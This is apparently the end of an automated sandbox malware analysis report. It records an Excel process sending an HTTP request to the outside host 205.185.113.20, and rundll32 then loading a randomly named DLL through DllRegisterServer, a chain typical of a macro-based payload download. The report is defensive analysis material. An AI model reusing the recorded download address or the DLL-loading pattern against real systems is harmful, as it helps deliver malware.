                                                                                                                                                    Nov 18, 2020 04:51:51.329812050 CET53565798.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:52.896838903 CET6063353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:52.943226099 CET53606338.8.8.8192.168.2.3

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 205.185.113.20

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349713205.185.113.2080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 18, 2020 04:50:23.306298018 CET878OUTGET /BVd1qKwd HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 205.185.113.20
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 18, 2020 04:50:23.505260944 CET879INHTTP/1.1 404 Not Found
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Wed, 18 Nov 2020 03:50:23 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    Expires: 0
                                                                                                                                                    Last-Modified: Wed, 18 Nov 2020 03:50:23 GMT
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: _subid=1m9efdt1oal;Expires=Saturday, 19-Dec-2020 03:50:23 GMT;Max-Age=2678400;Path=/
                                                                                                                                                    Vary: Accept-Encoding


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:04:50:16
                                                                                                                                                    Start date:18/11/2020
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x1a0000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:04:50:22
                                                                                                                                                    Start date:18/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
                                                                                                                                                    Imagebase:0x1210000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >